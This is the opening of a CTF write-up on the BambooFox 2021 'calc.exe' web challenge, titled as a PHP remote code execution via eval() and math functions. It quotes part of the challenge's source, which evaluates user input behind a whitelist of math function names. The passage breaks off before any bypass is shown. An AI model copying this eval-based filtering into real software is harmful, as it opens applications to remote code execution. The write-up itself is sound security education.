RCE with eval() + math functions in PHP
I solved this web challenge during the BambooFox CTF 2021 as part of the CTF Team Mayas . The name of the challenge was calc.exe and we were given a URL: http://chall.ctf.bamboofox.tw:13377 Upon accessing the URL, a simple input was shown. If we checked the source of the web page, we could see a link redirecting to http://chall.ctf.bamboofox.tw:13377/?source , which showed the source code of the application: <?php error_reporting ( 0 ) ; isset ( $_GET [ 'source' ] ) && die ( highlight_file ( __FILE__ ) ) ; function is_safe ( $query ) { $query = strtolower ( $query ) ; preg_match_all ( "/([a-z_]+)/" , $query , $words ) ; $words = $words [ 0 ] ; $good = [ 'abs' , 'acos' , 'acosh' , 'asin' , 'asinh' , 'atan2' , 'atan' , 'atanh' , 'base_convert' , 'bindec' , 'ceil' , 'cos' , 'cosh' , ...